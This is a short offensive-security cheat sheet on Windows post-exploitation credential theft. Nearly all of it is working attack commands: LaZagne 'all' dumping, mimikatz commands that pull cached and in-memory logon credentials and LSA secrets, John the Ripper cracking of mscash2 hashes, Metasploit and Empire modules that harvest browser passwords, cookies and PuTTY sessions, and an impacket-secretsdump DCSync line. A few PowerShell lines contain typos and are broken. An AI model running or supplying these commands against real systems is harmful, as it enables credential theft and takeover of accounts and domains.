# Post Exploitation

### LaZagne

Really simple and sweet tool for credential dumping

* <https://github.com/AlessandroZ/LaZagne>
* <https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3>

```
.\laZagne.exe all
```

### MSCash

Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon

From mimikatz,

```
privilege::debug
lsadump::cache
```

Cracking it

```
john-jumbo mscash --wordlist=/usr/share/wordlists/rockyou.txt  --format=mscash2
```

### Reading Event Logs

User must be in "Event Log Reader" group [Follow this link](https://evotec.xyz/powershell-everything-you-wanted-to-know-about-event-logs/)

```powershell
Get-WinEvent -ListLog *

# Listing logs of a specific user
$cred = Get-Credentials
Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred

# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessNam
e';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={
$_.Properties[8].Value }}).commandline
```

### Password Dumping

```powershell
# Metasploit
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
post/windows/gather/enum_putty_saved_sessions

# Empire
collection/ChromeDump
collection/FoxDump
collection/netripper
credentials/sessiongopher

# mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::secrets

# dcsync - secretsdump
impacket-secretsdump morph3@1.3.3.7
```

###

##